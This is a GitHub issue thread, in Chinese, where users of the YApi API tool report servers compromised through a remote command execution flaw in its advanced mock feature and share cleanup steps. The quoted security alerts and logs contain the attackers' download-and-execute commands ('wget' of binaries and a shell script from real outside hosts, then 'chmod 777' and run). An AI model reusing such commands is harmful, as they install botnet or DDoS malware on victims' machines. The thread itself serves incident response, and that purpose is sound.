Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

有安全漏洞, 服务器被入侵了 #2229

Closed
vosho opened this issue Jul 3, 2021 · 42 comments
Closed

有安全漏洞, 服务器被入侵了 #2229

vosho opened this issue Jul 3, 2021 · 42 comments

Comments

@vosho
Copy link

vosho commented Jul 3, 2021

版本号

版本: 1.9.2

什么问题

服务器被入侵了, 阿里云报的:

-[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
    -[26378]  node server/app.js
        -[31498]  /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000

-[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
    -[26378]  node server/app.js

-[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
    -[26378]  node server/app.js
        -[31498]  /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
            -[31502]  ./20000
                -[31503]  ./20000

该告警由如下引擎检测发现:
文件路径: /usr/bin/ps
恶意文件md5: c303c2fff08565b7977afccb762e2072
扫描来源方式: 进程启动扫描
进程id: 31969
进程命令行: ps aux

如何复现此问题

~

什么浏览器

~

什么系统(Linux, Windows, macOS)

Centos
@isuoge
Copy link

isuoge commented Jul 3, 2021

我也是 ,一模一样 ,刚被草了

@shenX-2021
Copy link

下载了20000文件,要怎么处理

@shaoxyz
Copy link

shaoxyz commented Jul 3, 2021

+1

@Kingofhevil
Copy link

Kingofhevil commented Jul 3, 2021
edited
Loading

关机,建个磁盘快照,保留现场,然后重建服务器系统,磁盘都初始化。排查安全问题,确保其他服务器安全。

@Kingofhevil
Copy link

关机,建个磁盘快照,保留现场,然后重建服务器系统,磁盘都初始化。排查安全问题,确保其他服务器安全。

应该是个挖矿木马

@Tzng
Copy link

Tzng commented Jul 3, 2021

我也中了,真无语~

@Anbool
Copy link

Anbool commented Jul 3, 2021
edited
Loading

巧了,我也是

@Anbool
Copy link

Anbool commented Jul 3, 2021

关机,建个磁盘快照,保留现场,然后重建服务器系统,磁盘都初始化。排查安全问题,确保其他服务器安全。

应该是个挖矿木马

不是,是DDOS木马

@luvvien
Copy link

luvvien commented Jul 3, 2021

wtf,我也被停了,难受呀,马飞,损失了一个亿

@tfenglin
Copy link

tfenglin commented Jul 3, 2021

我也是,我已经备份数据重装系统了

@wwwfeng
Copy link

wwwfeng commented Jul 4, 2021

Ip被华为云ban了,现在已经重置系统了😅

@mylafe
Copy link

mylafe commented Jul 5, 2021
edited
Loading

一模一样,mock远程命令执行漏洞。yapi注册功能关了,恶意搞事情账户已删除,服务器已快照回滚。
建议同步删除恶意mock脚本,防止二次受灾。

./mongo
> show dbs;
> use yapi;
> show tables;
> db.adv_mock.find();  # > DBQuery.shellBatchSize = 300 查询返回数
> db.adv_mock.deleteMany ({}) # 根据具体恶意mock数据过滤

BillGates僵尸网络木马

image
image

@luvvien
Copy link

luvvien commented Jul 5, 2021

一模一样,mock远程命令执行漏洞。yapi注册功能关了,恶意搞事情账户已删除,服务器已快照回滚
image

云服务器就很惨了,服务商直接就给shutdown,并且不给备份,不给开机,必须重置系统

@mylafe
Copy link

mylafe commented Jul 5, 2021

一模一样,mock远程命令执行漏洞。yapi注册功能关了,恶意搞事情账户已删除,服务器已快照回滚
image

云服务器就很惨了,服务商直接就给shutdown,并且不给备份,不给开机,必须重置系统

损失惨重!

@jwh5566
Copy link

jwh5566 commented Jul 5, 2021

一模一样,mock远程命令执行漏洞。yapi注册功能关了,恶意搞事情账户已删除,服务器已快照回滚
image

同云服务器,运气好,没给重置,下一次就要重置了 哈哈

@liuende501
Copy link

我也是, 先把服务关了, 看看有没有解决方法

@Tzng
Copy link

Tzng commented Jul 5, 2021

有这么一个数据~,真的是醉了
image

@mylafe
Copy link

mylafe commented Jul 5, 2021

有这么一个数据~,真的是醉了
image

先把注册入口关了吧,再把恶意账户删除

@Tzng
Copy link

Tzng commented Jul 5, 2021

有这么一个数据~,真的是醉了
image

先把注册入口关了吧,再把恶意账户删除

感觉这个人是有备而来的....

@tfenglin
Copy link

tfenglin commented Jul 5, 2021

建议中招者重新安装系统,因为系统的top netstat ps等常用系统命令文件均已被感染为木马文件。

@mylafe
Copy link

mylafe commented Jul 5, 2021

有这么一个数据~,真的是醉了
image

先把注册入口关了吧,再把恶意账户删除

感觉这个人是有备而来的....

是的。看这star量,受灾人数应该不少。

@annata
Copy link

annata commented Jul 5, 2021

+1,目前只能关闭注册删除恶意账户和恶意文件

@liuende501
Copy link

image
腾讯云的处理方案

@keijack
Copy link

keijack commented Jul 5, 2021

+1, 幸亏跑在 docker 里,docker 重建创建白名单之后解决问题。

@isuoge
Copy link

isuoge commented Jul 5, 2021

+1, 幸亏跑在 docker 里,docker 重建创建白名单之后解决问题。

机智呀,学习了!

@setResult
Copy link

高级Mock可以获取到系统操作权限
#2099

@wy-byte
Copy link

wy-byte commented Jul 7, 2021
edited
Loading

卧槽,我也有,不过他文件没下载成功,没执行成功,我的版本号是1.8.8
[ 7/7/2021, 7:05:17 AM ] [ error ] Command failed: id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
--2021-07-07 07:05:17-- http://2w.kacdn.cn/20000
Resolving 2w.kacdn.cn (2w.kacdn.cn)... 27.50.49.62
Connecting to 2w.kacdn.cn (2w.kacdn.cn)|27.50.49.62|:80... failed: Connection refused.
chmod: cannot access ‘20000’: No such file or directory
/bin/sh: ./20000: No such file or directory

下面是mongo的日志
2021-07-07T07:05:17.546+0800 I COMMAND [conn18] command yapi.statis_mock command: insert { insert: "statis_mock", documents: [ { interface_id: 3631, project_id: 349, group_id: 92, time: 1625612717, ip: "119.8.19.100", date: "2021-07-07", _id: 125, __v: 0 } ], ordered: true, lsid: { id: UUID("c9c74b63-2s2e-4ee7-a6f2-12f89c2ed29e") }, $db: "yapi" } ninserted:1 keysInserted:6 numYields:0 reslen:29 locks:{ Global: { acquireCount: { r: 1, w: 1 } }, Database: { acquireCount: { w: 1 } }, Collection: { acquireCount: { w: 1 } } } protocol:op_msg 111ms

db.statis_mock.find()
{ "_id" : 125, "interface_id" : 3631, "project_id" : 349, "group_id" : 92, "time" : 1625612717, "ip" : "119.8.19.100", "date" : "2021-07-07", "__v" : 0 }

@zengzhenhui
Copy link

受害者前来签到...还好用容器部署的,没污染到主机。

@sunsunzhe
Copy link

该告警由如下引擎检测发现:
命令行: /bin/sh -c id;wget http://27.50.49.61:2131/chongfu.sh;chmod 777 chongfu.sh;./chongfu.sh;
进程PID: 28813
进程文件名: busybox
父进程ID: 4028
父进程: node
父进程文件路径: /usr/local/bin/node
进程链:
-[1155] /usr/bin/containerd
-[4011] containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/09c36e162d6a67955981af03a76a6932f467cd170210890b8686e28d5a8f23c6 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
-[4028] node server/app.js

阿里云的

@Leskur
Copy link

Leskur commented Jul 8, 2021

http://27.50.49.61:1231/X64 (可以从 mongo adv_mock 中找到) 下载节点已经被我干掉了,已其人之道还治其人之身,让后来中招的小伙伴免受其害。

https://github.com/Leskur/ddos

@niesai
Copy link

niesai commented Jul 8, 2021

垃圾腾讯云,风控比不上阿里云!阿里云会直接发现报警被入侵,腾讯云关我屁事。

腾讯云天天提醒你开防火墙,你自己不开,出了事儿就会怪别人

你哪个脑细胞算出来我没开防火墙的?这是项目的漏洞和防火墙有关系?我吐槽的是客观事实关你屁事。爱干嘛干嘛去

谁说腾讯云没有提醒 ,我早就收到了

@ittce
Copy link

ittce commented Jul 8, 2021

新版本中已经使用开源项目safeify替代了node原有的代码执行沙箱。 大家可以参考最新一个pull request 修改。

@fengmk2
Copy link

fengmk2 commented Jul 9, 2021

https://mp.weixin.qq.com/s/yKDmMrhaWZIOTPsz6zqHYA 已经被全网公布漏洞攻击方式,建议所有人先关闭公网入口,然后尽快升级。

@ittce
Copy link

ittce commented Jul 9, 2021

新版本中已经使用开源项目safeify替代了node原有的代码执行沙箱。 大家可以参考最新一个pull request 修改。

@ittce ittce closed this as completed Jul 9, 2021
@PlmBest
Copy link

PlmBest commented Jul 9, 2021

受害者来了,刚开始不以为常,甚至怀疑阿里机房出问题了。后来越发不对劲,排查到yapi的一个X64,一看就不对,顺藤摸瓜基本全部清除了。来issue才发现这么多受害者。

@skcwiiur
Copy link

skcwiiur commented Jul 9, 2021

垃圾腾讯云,风控比不上阿里云!阿里云会直接发现报警被入侵,腾讯云关我屁事。

腾讯云天天提醒你开防火墙,你自己不开,出了事儿就会怪别人

你哪个脑细胞算出来我没开防火墙的?这是项目的漏洞和防火墙有关系?我吐槽的是客观事实关你屁事。爱干嘛干嘛去

谁说腾讯云没有提醒 ,我早就收到了

懒得跟你废话,首先你吐槽的是腾讯云风控,腾讯云无时无刻提示你开,包括邮件、短信,重大事件还会有人工电话,然而你忽略了,然后无脑喷腾讯云没有风控,只能说你没长眼睛,这是其一,其二,没理由没根据,逮谁喷谁,还是你那句话,项目有漏洞你爱用不用,我指名道姓就是骂你这个废物关你屁事,爱干嘛干嘛去

自以为很懂?哪只眼睛看到我没关注短信邮件通知了,只会自以为是?就是因为几天前邮件服务器报警负载异常了,才排除了这次入侵好吧,当然是在腾讯云发出这个文章之前。文章发出之后,我已经删除之前的评论了,但是这不影响腾讯云慢一步的客观事实吧?怒其不争是鞭策他更进一步,保障用户安全。你说的腾讯云企业级收费防火墙不好意思,我不买的。我只是买个机器随便玩玩的,这个YAPI也是好久前随手搭建玩玩的。你是腾讯的哪颗葱?这么护犊子?好好做好自己的产品,别来网上乱咬人

@skcwiiur
Copy link

skcwiiur commented Jul 9, 2021

垃圾腾讯云,风控比不上阿里云!阿里云会直接发现报警被入侵,腾讯云关我屁事。

腾讯云天天提醒你开防火墙,你自己不开,出了事儿就会怪别人

你哪个脑细胞算出来我没开防火墙的?这是项目的漏洞和防火墙有关系?我吐槽的是客观事实关你屁事。爱干嘛干嘛去

谁说腾讯云没有提醒 ,我早就收到了

懒得跟你废话,首先你吐槽的是腾讯云风控,腾讯云无时无刻提示你开,包括邮件、短信,重大事件还会有人工电话,然而你忽略了,然后无脑喷腾讯云没有风控,只能说你没长眼睛,这是其一,其二,没理由没根据,逮谁喷谁,还是你那句话,项目有漏洞你爱用不用,我指名道姓就是骂你这个废物关你屁事,爱干嘛干嘛去

自以为很懂?哪只眼睛看到我没关注短信邮件通知了,只会自以为是?就是因为几天前邮件服务器报警负载异常了,才排除了这次入侵好吧,当然是在腾讯云发出这个文章之前。文章发出之后,我已经删除之前的评论了,但是这不影响腾讯云慢一步的客观事实吧?怒其不争是鞭策他更进一步,保障用户安全。你说的腾讯云企业级收费防火墙不好意思,我不买的。我只是买个机器随便玩玩的,这个YAPI也是好久前随手搭建玩玩的。你是腾讯的哪颗葱?这么护犊子?好好做好自己的产品,别来网上乱咬人

就会无脑喷,上过学吗?爱用不用,YAPI、腾讯云、阿里云哪个不比你强百倍,轮得着你在这说三道四评判这个评判那个的

你才是个真喷子。懒得理你了

@keijack
Copy link

keijack commented Jul 9, 2021

垃圾腾讯云,风控比不上阿里云!阿里云会直接发现报警被入侵,腾讯云关我屁事。

腾讯云天天提醒你开防火墙,你自己不开,出了事儿就会怪别人

你哪个脑细胞算出来我没开防火墙的?这是项目的漏洞和防火墙有关系?我吐槽的是客观事实关你屁事。爱干嘛干嘛去

谁说腾讯云没有提醒 ,我早就收到了

懒得跟你废话,首先你吐槽的是腾讯云风控,腾讯云无时无刻提示你开,包括邮件、短信,重大事件还会有人工电话,然而你忽略了,然后无脑喷腾讯云没有风控,只能说你没长眼睛,这是其一,其二,没理由没根据,逮谁喷谁,还是你那句话,项目有漏洞你爱用不用,我指名道姓就是骂你这个废物关你屁事,爱干嘛干嘛去

自以为很懂?哪只眼睛看到我没关注短信邮件通知了,只会自以为是?就是因为几天前邮件服务器报警负载异常了,才排除了这次入侵好吧,当然是在腾讯云发出这个文章之前。文章发出之后,我已经删除之前的评论了,但是这不影响腾讯云慢一步的客观事实吧?怒其不争是鞭策他更进一步,保障用户安全。你说的腾讯云企业级收费防火墙不好意思,我不买的。我只是买个机器随便玩玩的,这个YAPI也是好久前随手搭建玩玩的。你是腾讯的哪颗葱?这么护犊子?好好做好自己的产品,别来网上乱咬人

就会无脑喷,上过学吗?爱用不用,YAPI、腾讯云、阿里云哪个不比你强百倍,轮得着你在这说三道四评判这个评判那个的

不要在 issue 里吵架呀。喂。想吵加个 QQ 或者 微信吵呀。

@susiexd
Copy link

susiexd commented Jul 9, 2021
edited
Loading

这个问题有点严重,加 yapi 交流群,互助看下怎么解决吧,QQ群:878275911
image

@jesseteo
Copy link

来这里互助吧
image

@jessezhang001
Copy link

YApi 是一个非常优秀的项目,只是基本没有维护了。
所以我们考虑新开一个分支(YApi Pro https://github.com/yapi-pro/yapi )接手维护, 希望更多人能参与进来。
YApi Pro 是 YApi 的长期维护分支,我们将长期维护,及时更新、处理问题,欢迎更多社区的小伙伴一起参与。

@ahkimkoo
Copy link

同样的问题,几个小时就花了2500流量费。注册接口关了是没有用的,目前没有找到有效的办法。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests